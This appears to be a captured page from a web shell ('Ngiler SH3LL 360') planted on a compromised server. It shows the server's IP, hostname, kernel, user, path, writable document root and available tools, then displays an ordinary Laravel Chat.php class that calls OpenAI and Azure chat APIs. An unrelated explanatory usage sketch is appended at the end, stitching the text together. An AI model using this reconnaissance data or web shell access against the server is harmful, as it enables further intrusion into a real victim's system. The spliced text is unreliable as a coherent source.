Ngiler SH3LL 360
Path : /home/tbf/tbfguestbe.tbf.ro/app/Managers/OpenAI/
Information Server
MySQL : OFF
Perl : OFF
CURL : ON
WGET : OFF
PKEXEC : OFF
Directive : Local Value
IP Address : 89.40.16.97
System : Linux server.atelieruldeit.ro 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64
User : tbf
PHP Version : 7.3.33
Software : Apache
Doc root : Writable
Edit File : Chat.php | Size : 16.61 KB
<?php

namespace App\Managers\OpenAI;

use App\Managers\LogManager;
use App\Managers\PromptManager;
use App\Models\AiLog;
use App\Models\Instance;
use App\Models\Project;
use App\Models\Prompt;
use GuzzleHttp\Client;
use Illuminate\Database\Eloquent\Collection;
use Illuminate\Support\Facades\Cache;
use Mis3085\Tiktoken\Facades\Tiktoken;

class Chat extends RequestUri
{
    /**
     * The user input.
     */
    private ?string $userInput;

    /**
     * The context for the chat.
     */
    private ?int $contextId;

    /**
     * The AI model for the chat.
     */
    private ?string $aiModel;

    /**
     * The temperature for the chat.
     */
    private ?float $aiTemperature;

    /**
     * The max tokens for the chat.
     */
    private ?int $aiMaxToken;

    /**
     * The top_p for the chat.
     */
    private ?int $topP;

    /**
     * The frequency penalty for the chat.
     */
    private ?float $frequencyPenalty;

    /**
     * The presence penalty for the chat.
     */
    private ?float $presencePenalty;

    /**
     * The HTTP client for the chat request.
     */
    private ?Client $client;

    /**
     * The id of the prompt that is asking for this call.
     */
    private ?int $promptId;

    /**
     * The is_test attribute.
     */
    private ?bool $isTest;

    /**
     * The JSON schema for the chat.
     */
    private ?string $schema;

    /**
     * The system input, if one exists before the chat starts.
     */
    private ?string $systemInput;

    /**
     * The instance_id sent in options.
     */
    private ?int $instanceId;

    /**
     * The return_content_type sent in options.
     */
    private ?string $returnContentType;

    /**
     * The ai_account sent in options.
     */
    private ?string $aiAccount;

    /**
     * The resource_id refers to the main resource for which the prompt is executed.
     */
    private ?int $resourceId;

    /**
     * The number of tokens calculated by the Tiktoken library.
     */
    private ?int $tokens;

    /**
     * Variables used for retrying calls to OpenAI.
     */
    private $retryCount;
    private $maxRetries;
    private $backoffFactor;

    /**
     * JSON payload sent in the OpenAI API request body.
     */
    private $json;

    /**
     * Config value that enables a round-robin technique for switching the AI account on each call.
     */
    private $alternateAccounts;

    /**
     * Create a new Chat instance from the user input and options.
     *
     * @param string $userInput
     * @param array $options
     * @param int|null $contextId
     */
    public function __construct(string $userInput, array $options, int $contextId = null)
    {
        $this->userInput = $userInput;
        $this->systemInput = $options && isset($options['system_input']) ? $options['system_input'] : '';
        $this->returnContentType = $options && isset($options['return_content_type']) ? $options['return_content_type'] : '';
        $this->contextId = $contextId;
        $this->isTest = $options && isset($options['is_test']) ? $options['is_test'] : false;
        $this->aiModel = $options && !is_null($options['ai_model']) ? $options['ai_model'] : '';
        $this->aiTemperature = $options && !is_null($options['ai_temperature']) ? $options['ai_temperature'] : 0.7;
        $this->aiMaxToken = $options && !is_null($options['max_tokens']) ? $options['max_tokens'] : 14000;
        $this->topP = $options && !is_null($options['top_p']) ? $options['top_p'] : 1;
        $this->frequencyPenalty = $options && !is_null($options['frequency_penalty']) ? $options['frequency_penalty'] : 0;
        $this->presencePenalty = $options && !is_null($options['presence_penalty']) ? $options['presence_penalty'] : 1;
        $this->schema = $options && !is_null($options['return_json_schema']) ? $options['return_json_schema'] : null;
        $this->instanceId = $options && isset($options['instance_id']) ? $options['instance_id'] : null;
        $this->promptId = $options && isset($options['prompt_id']) ? $options['prompt_id'] : null;
        $this->aiAccount = $options && !is_null($options['ai_account'])
            ? $options['ai_account'] : null;
        $this->resourceId = $options && isset($options['resource_id']) ? $options['resource_id'] : null;
        $this->retryCount = 1;
        $this->maxRetries = config('app.openai_max_retries'); // maximum number of retries
        $this->backoffFactor = config('app.openai_retry_backoff_factor');
        $this->alternateAccounts = config('app.openai_alternate_accounts');

        if (!Cache::has('ai_account')) {
            Cache::forever('ai_account', Prompt::$aiAccounts[0]);
        }
    }

    /**
     * Creates a completion for the chat message.
     *
     * @see https://platform.openai.com/docs/api-reference/chat/create
     */
    public function create()
    {
        $this->json = $this->buildRequestJson();

        while ($this->retryCount <= $this->maxRetries) {
            try {
                $uri = $this->getApiUri();
                $response = $this->sendRequest($uri);

                if ($response) {
                    return $this->handleSuccessResponse($response);
                }
                break;
            } catch (\Exception $e) {
                if ($this->shouldRetry($e)) {
                    $this->handleRetry($e, $uri);
                    $this->retryCount++;
                } else {
                    $this->handleError($e);
                    break;
                }
            }
        }

        return $this->handleInconsistentResponse();
    }

    /**
     * Build the JSON request data for the chat message.
     *
     * @return array
     */
    private function buildRequestJson()
    {
        self::getContextId();
        $aiLogs = self::getHistory();
        $systemInput = self::getSystemInput($aiLogs);
        $message = self::buildConversation($aiLogs, $systemInput);
        $this->tokens = Tiktoken::count($systemInput . $this->userInput);

        $json = [
            'temperature' => $this->aiTemperature,
            'max_tokens' => $this->getMaxToken(),
            "messages" => $message,
            "top_p" => $this->topP,
            "frequency_penalty" => $this->frequencyPenalty,
            "presence_penalty" => $this->presencePenalty,
        ];

        if ($this->schema && $this->returnContentType != 'text_json') {
            $schema = json_decode($this->schema);
            $json['functions'] = [
                ['name' => 'get_response', 'parameters' => $schema]
            ];
            $json['function_call'] = ['name' => 'get_response'];
        }

        return $json;
    }

    /**
     * Return max_tokens, capped at the maximum supported for the AI account / model.
     *
     * @return int
     */
    private function getMaxToken()
    {
        if ($this->aiAccount == Prompt::AI_ACCOUNT_AZURE) {
            return $this->aiMaxToken < 28000 ? $this->aiMaxToken : 28000;
        } elseif ($this->aiAccount == Prompt::AI_ACCOUNT_AZURE_2) { // lower cap for the second Azure deployment
            return $this->aiMaxToken < 7000 ? $this->aiMaxToken : 7000;
        } elseif ($this->aiModel == 'gpt-3.5-turbo-16k') {
            return $this->aiMaxToken < 15000 ? $this->aiMaxToken : 15000;
        } elseif ($this->aiModel == 'gpt-4') {
            return $this->aiMaxToken < 7800 ? $this->aiMaxToken : 7800;
        } else {
            return $this->aiMaxToken < 7800 ? $this->aiMaxToken : 7800;
        }
    }

    /**
     * Determine the API URI based on configuration and retry count.
     *
     * @return string
     */
    private function getApiUri()
    {
        if ($this->alternateAccounts && $this->aiAccount != Prompt::AI_ACCOUNT_AZURE) {
            $this->aiAccount = Cache::get('ai_account');
        }

        if ($this->tokens + $this->aiMaxToken > 7000) {
            // large requests are routed to the Azure deployment
            $this->aiAccount = Prompt::AI_ACCOUNT_AZURE;
            $uri = config('app.openai_api_url_azure') . 'openai/deployments/'
                . config('app.openai_api_deployment_name_azure')
                . '/chat/completions?api-version=' . config('app.openai_api_version_azure');
        } else {
            switch ($this->aiAccount) {
                case Prompt::AI_ACCOUNT_AZURE:
                    $uri = config('app.openai_api_url_azure') . 'openai/deployments/'
                        . config('app.openai_api_deployment_name_azure')
                        . '/chat/completions?api-version=' . config('app.openai_api_version_azure');
                    break;
                case Prompt::AI_ACCOUNT_AZURE_2:
                    $uri = config('app.openai_api_url_azure_2') . 'openai/deployments/'
                        . config('app.openai_api_deployment_name_azure_2')
                        . '/chat/completions?api-version='
                        . config('app.openai_api_version_azure_2');
                    break;
                case Prompt::AI_ACCOUNT_2:
                    $this->aiAccount = Prompt::AI_ACCOUNT_2;
                    $uri = 'chat/completions';
                    break;
                case Prompt::AI_ACCOUNT_3:
                    $this->aiAccount = Prompt::AI_ACCOUNT_3;
                    $uri = 'chat/completions';
                    break;
                default:
                    $this->aiAccount = Prompt::AI_ACCOUNT_1;
                    $uri = 'chat/completions';
                    break;
            }
        }

        if ($this->retryCount >= 2) {
            // on retries, walk through the other accounts one by one
            $uri = 'chat/completions';
            switch ($this->retryCount) {
                case 2:
                    $this->aiAccount = Prompt::AI_ACCOUNT_2;
                    break;
                case 3:
                    $this->aiAccount = Prompt::AI_ACCOUNT_3;
                    break;
                case 4:
                    $this->aiAccount = Prompt::AI_ACCOUNT_AZURE_2;
                    $uri = config('app.openai_api_url_azure_2') . 'openai/deployments/'
                        . config('app.openai_api_deployment_name_azure_2')
                        . '/chat/completions?api-version=' . config('app.openai_api_version_azure_2');
                    break;
                case 5:
                    $this->aiAccount = Prompt::AI_ACCOUNT_AZURE;
                    $uri = config('app.openai_api_url_azure') . 'openai/deployments/'
                        . config('app.openai_api_deployment_name_azure')
                        . '/chat/completions?api-version=' . config('app.openai_api_version_azure');
                    break;
                case 6:
                    $this->aiAccount = Prompt::AI_ACCOUNT_1;
                    break;
            }
        }

        if ($this->alternateAccounts && $this->aiAccount != Prompt::AI_ACCOUNT_AZURE) {
            // rotate the cached account to the next one in the round-robin list
            $currentValue = Cache::get('ai_account');
            $currentIndex = array_search($currentValue, Prompt::$aiAccounts);

            if ($currentIndex !== false) {
                $nextIndex = ($currentIndex === count(Prompt::$aiAccounts) - 1) ? 0 : $currentIndex + 1;
                $nextValue = Prompt::$aiAccounts[$nextIndex];
                Cache::forever('ai_account', $nextValue);
            } else {
                Cache::forever('ai_account', Prompt::$aiAccounts[0]);
            }
        }

        return $uri;
    }

    /**
     * Send the HTTP request to the API and return the response.
     *
     * @param string $uri
     * @return mixed
     */
    private function sendRequest($uri)
    {
        if ($this->aiAccount === Prompt::AI_ACCOUNT_AZURE || $this->aiAccount === Prompt::AI_ACCOUNT_AZURE_2) {
            unset($this->json['model']); // the Azure deployment already determines the model
        } else {
            $this->json['model'] = $this->aiModel;
        }

        $this->client = self::setupRequest($this->aiAccount);
        $response = $this->client->post($uri, [
            'json' => $this->json
        ]);

        return $response;
    }

    /**
     * Determine if the exception should trigger a retry.
     *
     * @param \Exception $e
     * @return bool
     */
    private function shouldRetry($e)
    {
        $status = null;
        try {
            $status = $e->getResponse()->getStatusCode();
        } catch (\Throwable $th) {
        }

        if ($status == 400) { // token limit is reached
            $this->tokens = 9000; // set a large token count to force the next attempt onto Azure
            return true;
        }
        if (in_array($status, [401, 429, 502, 503])) {
            return true;
        }

        return false;
    }

    /**
     * Handle a retry attempt, including logging and exponential backoff.
     *
     * @param \Exception $e
     * @param string $uri
     */
    private function handleRetry($e, $uri)
    {
        $logAdditionalData = [
            'retryCount' => $this->retryCount,
            'error' => $e,
            'backoffFactor' => $this->backoffFactor,
            'json' => $this->json,
            'instanceId' => $this->instanceId,
            'client' => $this->client,
            'uri' => $uri,
            'account' => $this->aiAccount
        ];

        $status = $e->getResponse()->getStatusCode();
        if ($status === 401) {
            LogManager::writeAiRetryResponseLog('warning', $logAdditionalData);
        } elseif (in_array($status, [400, 401, 429, 502, 503])) {
            LogManager::writeAiServiceErrorLog('error', $logAdditionalData);
        }

        sleep($this->backoffFactor ** $this->retryCount);
    }

    /**
     * Handle other types of errors.
     *
     * @param \Exception $e
     * @return bool
     */
    private function handleError($e)
    {
        LogManager::writeAiServiceErrorLog('error', ['error' => $e, 'json' => $this->json, 'instanceId' => $this->instanceId]);

        return false;
    }

    /**
     * Handle a successful API response.
     *
     * @param mixed $response
     * @return array
     */
    private function handleSuccessResponse($response)
    {
        $body = $response->getBody();
        $content = json_decode($body, true);
        $isJson = false;
        $completedText = null;

        if (isset($content['choices']) && isset($content['choices'][0]['message']) && isset($content['choices'][0]['message']['content'])) {
            $completedText = $content['choices'][0]['message']['content'];
        }
        if (is_null($completedText)) {
            // no plain message content, so the answer came back as a function_call payload
            $completedText = $content['choices'][0]['message']['function_call']['arguments'];
            $isJson = true;
        }

        if ($content['id']) {
            $aiLog = self::store($content, $this->systemInput, $completedText, $response->getHeaders());
        }

        if ($this->schema && !$isJson && $this->returnContentType == 'text_json') {
            $completedText = $this->getResponseInJson($completedText);
        }

        if ($this->schema && $isJson) {
            if (!json_decode($completedText, true)) {
                // if the JSON cannot be decoded, strip special characters (newline, tab, etc.) and replace them with ' '
                $pattern = '/\s+/';
                $completedTextWithoutWrongSpaces = preg_replace($pattern, ' ', $completedText);

                if (!json_decode($completedTextWithoutWrongSpaces, true)) {
                    LogManager::writeAiWrongJsonResponseLog('warning', ['promptId' => $this->promptId, 'instanceId' => $this->instanceId]);
                    $completedText = $this->tryToFixJsonResponse($completedText);
                } else {
                    $completedText = $completedTextWithoutWrongSpaces;
                }
            }
        }

        return [
            'content' => $completedText,
            'context_id' => $this->contextId,
            'ai_log_id' => isset($aiLog) ? $aiLog->id : null,
        ];
    }

    /**
     * Make another call to transform text into JSON.
     */
    private function getResponseInJson($result)
    {
        $instance = Instance::find($this->instanceId);
        $result = PromptManager::generateJsonFromText($result, $this->promptId, $instance);

        return $result;
    }

    /**
     * Make another call to the AI to fix the error in the JSON structure.
     */
    private function tryToFixJsonResponse($result)
    {
        $instance = Instance::find($this->instanceId);
        $result = PromptManager::generateCorrectJson($result, $this->promptId, $instance);

        return $result;
    }

    /**
     * Handle the case where all retries fail.
     *
     * @return array
     */
    private function handleInconsistentResponse()
    {
        LogManager::writeAiWrongResponseLog('warning', ['promptId' => $this->promptId, 'instanceId' => $this->instanceId]);

        return [
            'status' => 'error',
            'content' => '',
            'message' => 'Ceva nu a mers bine la generare!' // "Something went wrong during generation!"
        ];
    }

    /**
     * Store the request and response details in an AiLog record.
     */
    private function store($content, $systemInput, $completedText, $responseHeader)
    {
        $authUser = auth()->user() ?? null;
        if ($authUser) {
            $instanceId = $authUser->instance->id;
        } else {
            $instanceId = $this->instanceId;
        }

        $softModelType = AiLog::SOFT_MODEL_TYPE['procedure'];

        $aiLog = AiLog::create([
            'ai_account' => $this->aiAccount,
            'resource_id' => $this->resourceId ?? null,
            'instance_id' => $instanceId ?? null,
            'user_id' => $authUser ? $authUser->id : null,
            'prompt_id' => $this->promptId ?? null,
            'app_model_type' => $softModelType,
            'context_id' => $this->contextId,
            'is_test' => $this->isTest,
            'temperature' => $this->aiTemperature,
            'max_tokens' => $this->aiMaxToken,
            'object' => $content['object'],
            'ai_model' => $content['model'],
            'prompt_tokens' => $content['usage']['prompt_tokens'],
            'completion_tokens' => $content['usage']['completion_tokens'],
            'total_tokens' => $content['usage']['total_tokens'],
            'system' => $systemInput,
            'user_input' => $this->userInput,
            'assistant_message' => $completedText,
            'finish_reason' => $content['choices'][0]['finish_reason'],
            'response_index' => $content['choices'][0]['index'],
            'response_header' => $responseHeader ?? null,
        ]);

        return $aiLog;
    }

    /**
     * Construct the system input for the chat.
     *
     * @param Collection $aiLogs
     */
    private function getSystemInput(Collection $aiLogs)
    {
        $systemInput = $this->systemInput ? $this->systemInput : '';
        if ($aiLogs->first()) {
            $systemInput = $aiLogs->first()->system;
        }

        return $systemInput;
    }

    /**
     * Get the history used to build the chat context from AiLog.
     *
     * @return Collection $aiLogs
     */
    private function getHistory()
    {
        $aiLogs = AiLog::where('context_id', $this->contextId)->orderBy('id')->get();

        return $aiLogs;
    }

    /**
     * Construct the context_id if it does not exist yet.
     */
    private function getContextId()
    {
        if (!$this->contextId) {
            $lastContext = AiLog::select('context_id')->orderBy('context_id', 'desc')->first();
            if ($lastContext) {
                $lastContextId = $lastContext->context_id;
            }
            $this->contextId = ($lastContextId ?? 0) + 1;
        }
    }

    /**
     * Construct the conversation history.
     *
     * @param Collection $aiLogs
     * @param string $systemInput
     */
    private function buildConversation(Collection $aiLogs, string $systemInput)
    {
        $conversation = [];
        array_push($conversation, ["role" => "system", "content" => $systemInput]);

        $aiLogs->each(function ($item) use (&$conversation) {
            array_push(
                $conversation,
                ["role" => "user", "content" => $item->user_input],
                ["role" => "assistant", "content" => $item->assistant_message]
            );
        });

        $message = [
            ...$conversation,
            ["role" => "user", "content" => $this->userInput]
        ];

        return $message;
    }
}
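A minimal usage sketch of the class above, assuming the surrounding Laravel app provides the referenced config keys, Prompt constants, and ai_logs table; the option values, the caller, and the user input shown here are illustrative assumptions, not part of the original file:

<?php

use App\Managers\OpenAI\Chat;

// Hypothetical caller, e.g. inside a controller or queued job.
// All option keys read by the constructor are provided explicitly.
$options = [
    'system_input' => 'You are a helpful assistant.',
    'return_content_type' => 'text',   // or 'text_json' to post-process the answer into JSON
    'is_test' => false,
    'ai_model' => 'gpt-3.5-turbo-16k',
    'ai_temperature' => 0.7,
    'max_tokens' => 14000,
    'top_p' => 1,
    'frequency_penalty' => 0,
    'presence_penalty' => 1,
    'return_json_schema' => null,      // a JSON schema string enables function-call output
    'instance_id' => null,
    'prompt_id' => null,
    'ai_account' => null,              // null lets getApiUri() pick an account
    'resource_id' => null,
];

$chat = new Chat('Summarize the onboarding procedure.', $options, null);
$result = $chat->create();

// On success: ['content' => ..., 'context_id' => ..., 'ai_log_id' => ...]
// After exhausting all retries: ['status' => 'error', 'content' => '', 'message' => ...]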